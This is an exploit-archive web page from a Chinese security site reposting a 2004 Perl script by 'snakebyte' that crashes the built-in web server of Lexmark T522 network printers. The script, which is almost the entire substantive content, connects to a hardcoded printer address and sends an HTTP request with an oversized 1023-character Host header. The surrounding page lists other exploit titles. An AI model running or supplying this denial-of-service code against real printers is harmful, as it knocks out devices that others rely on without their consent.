首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Lexmark Network Printers Built-in Web Server DoS
来源:www.snake-basket.de 作者:snakebyte 发布时间:2004-07-28  

Lexmark Network Printers Built-in Web Server DoS


#!/usr/bin/perl
#
# Denial of Service agains Lexmark T522 Network Printer Webserver
# by snakebyte / eric ( http://www.snake-basket.de )
use Socket;

$target = "192.168.0.54";
$port = "80";
$lamecode = "A" x 1023;

$iaddr = inet_aton($target);
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname("tcp") || die "getprotobyname: $!\n";
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die "socket: $!\n";
connect(SOCKET, $paddr) || die "connection attempt failed: $!\n";
send(SOCKET, "GET / HTTP/1.0\r\n", 0);
send(SOCKET, "Host: ".$lamecode."\r\n\r\n", 0);
close SOCKET;



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ms04-022 exp for xp sp1
·JSP的WEBSHELL
·Denial of Service in Microsoft
·WinXP Task Scheduler (.job) Un
·Mensajeitor Exploit
·SoX Local Buffer Overflow Expl
·NetSupport DNA HelpDesk SQL In
·Citadel/UX Remote DoS exploit
·Polar HelpDesk Remote Exploit
·SoX v12.x ".WAV" File Processi
·Internet Software Sciences's S
·OpenFTPD <= 0.30.1 Remote f
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved